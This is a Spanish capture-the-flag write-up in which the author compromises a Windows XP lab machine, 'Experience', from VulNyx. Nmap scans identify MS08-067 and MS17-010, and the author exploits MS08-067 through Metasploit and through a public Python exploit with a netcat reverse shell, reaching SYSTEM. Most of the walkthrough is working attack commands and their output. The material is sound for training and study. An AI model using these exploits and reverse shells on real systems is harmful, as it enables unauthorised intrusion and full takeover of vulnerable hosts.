Experience es una máquina Windows de dificultad fácil de la plataforma VulNyx, creada por d4t4s3c y funciona correctamente en VirtualBox.
Skills:
- SMB Enumeration
- MS08-067 (CVE-2008-4250)
Nmap
❯ nmap -n -Pn -sS -p- --min-rate="5000" 192.168.1.50
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-22 11:10 CET
Nmap scan report for 192.168.1.50
Host is up (0.00031s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 08:00:27:B7:E5❯ nmap -n -Pn -sVC -p135,139,445 192.168.1.50
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-22 11:11 CET
Nmap scan report for 192.168.1.50
Host is up (0.00044s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
MAC Address: 08:00:27:B7:E5:9C (Oracle VirtualBox virtual NIC)
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: experience
| NetBIOS computer name: EXPERIENCE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2024-01-22T11:11:36-08:00
|_nbstat: NetBIOS name: EXPERIENCE, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:b7:e5:9c (Oracle VirtualBox virtual NIC)
|_clock-skew: mean: 12h59m57s, deviation: 5h39m24s, median: 8h59m57s
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)135 msrpc Microsoft Windows RPC
139 netbios-ssn Microsoft Windows netbios-ssn
445 microsoft-ds Windows XP microsoft-ds
Port: 445 (SMB)
realizo con NetExec una enumeración básica sobre SMB
❯ nxc smb 192.168.1.50
SMB 192.168.1.50 445 EXPERIENCE [*] Windows 5.1 x32 (name:EXPERIENCE) (domain:experience) (signing:False) (SMBv1:True)en vista que es un Windows XP y la versión de SMB es muy antigua, lanzo scripts NSE de Nmap para detectar posibles vulnerabilidades.
❯ nmap -p445 --script="smb-vuln-*" 192.168.1.50
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-22 11:35 CET
Nmap scan report for experience.home (192.168.1.50)
Host is up (0.00038s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 08:00:27:B7:E5:9C (Oracle VirtualBox virtual NIC)
Host script results:
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-054: false
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspxMS08–067 (CVE-2008-4250)
Automatic Exploitation (Metasploit)
cargo el modulo ms08_067_netapi y seteo todas las opciones requeridas
❯ msfconsole -q
msf6 > search MS08-067
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi
msf6 > use exploit/windows/smb/ms08_067_netapi
msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 192.168.1.50
msf6 exploit(windows/smb/ms08_067_netapi) > set LHOST 192.168.1.53
msf6 exploit(windows/smb/ms08_067_netapi) > set LPORT 443lanzo el exploit y obtengo una shell como NT AUTHORITY\SYSTEM
msf6 exploit(windows/smb/ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 192.168.1.53:443
[*] 192.168.1.50:445 - Automatically detecting the target...
[*] 192.168.1.50:445 - Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] 192.168.1.50:445 - Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] 192.168.1.50:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175686 bytes) to 192.168.1.50
[*] Meterpreter session 1 opened (192.168.1.53:443 -> 192.168.1.50:1028) at 2024-01-22 11:40:03 +0100
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEMManual Exploitation (Python Exploit)
busco exploits públicos para MS08-67
lanzo el exploit ms08–067.py
❯ python3 ms08-067.py 192.168.1.50 6 445 192.168.1.53 443
@@@@@@@@@@ @@@@@@ @@@@@@@@ @@@@@@ @@@@@@@@ @@@@@@ @@@@@@@@
@@@@@@@@@@@ @@@@@@@ @@@@@@@@@@ @@@@@@@@ @@@@@@@@@@ @@@@@@@ @@@@@@@@
@@! @@! @@! !@@ @@! @@@@ @@! @@@ @@! @@@@ !@@ @@!
!@! !@! !@! !@! !@! @!@!@ !@! @!@ !@! @!@!@ !@! !@!
@!! !!@ @!@ !!@@!! @!@ @! !@! !@!!@! @!@!@!@!@ @!@ @! !@! !!@@!@! @!!
!@! ! !@! !!@!!! !@!!! !!! !!@!!! !!!@!@!!! !@!!! !!! @!!@!!!! !!!
!!: !!: !:! !!:! !!! !!: !!! !!:! !!! !:! !:! !!:
:!: :!: !:! :!: !:! :!: !:! :!: !:! :!: !:! :!:
::: :: :::: :: ::::::: :: ::::: :: ::::::: :: :::: ::: ::
: : :: : : : : : : : : : : : : : :: : : : :
Windows XP SP3 English (NX)
[+] Generating shellcode ...
[+] Initiating connection ...
[+] Connected to ncacn_np:192.168.1.50[\pipe\browser]
[+] Setting up listener ...obtengo la shell como NT AUTHORITY\SYSTEM
❯ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.53] from (UNKNOWN) [192.168.1.50] 1028
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
C:\WINDOWS\system32>whoami
whoami
'whoami' is not recognized as an internal or external command,
operable program or batch file.el OS es antiguo y no dispone del binario whoami, así que busco el incluido en Kali y lo comparto vía SMB levantando un recurso llamado a
❯ find / -name whoami.exe 2>/dev/null
/usr/share/windows-resources/binaries/whoami.exe
❯ cp /usr/share/windows-resources/binaries/whoami.exe .
❯ impacket-smbserver a $(pwd)
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsedrealizo nuevamente un whoami apuntando al whoami.exe de mi recurso y confirmo que soy NT AUTHORITY\SYSTEM
C:\WINDOWS\system32>//192.168.1.53/a/whoami.exe
NT AUTHORITY\SYSTEMya como NT AUTHORITY\SYSTEM puedo leer las flags user.txt y root.txt
C:\Documents and Settings\bill\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 8842-9464
Directory of C:\Documents and Settings\bill\Desktop
01/21/2024 11:41 AM <DIR> .
01/21/2024 11:41 AM <DIR> ..
01/21/2024 11:41 AM 35 root.txt
01/21/2024 11:41 AM 35 user.txt
2 File(s) 70 bytes
2 Dir(s) 7,828,291,584 bytes free
C:\Documents and Settings\bill\Desktop>type *.txt
c1d5e7e*************************
f9e24c8*************************hasta aquí la máquina Experience.
Happy Hacking!
